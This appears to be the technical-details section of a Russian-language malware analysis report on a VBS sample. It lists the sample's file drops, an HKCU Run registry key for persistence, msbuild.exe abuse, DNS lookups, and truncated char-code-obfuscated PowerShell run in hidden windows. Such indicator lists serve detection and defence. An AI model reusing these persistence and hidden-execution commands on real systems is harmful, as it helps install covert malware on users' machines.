Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '%APPDATA%\<Имя файла>.vbs'
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- %APPDATA%\<Имя файла>.vbs
- http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/02FAF3E291435468607857694DF5E45B68851868.crt
- DNS ASK google.com
- DNS ASK or######stsurukyo.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $dkjkdjkdjdkjdkdjkdjdkjdkdjdkdjkddksjksjsk=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%APPDATA%\<Имя файла>.vbs'' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "%APPDATA%" /Y' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $dkjkdjkdjdkjdkdjkdjdkjdkdjdkdjkddksjksjsk=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%APPDATA%\<Имя файла>.vbs'
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "%APPDATA%" /Y
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'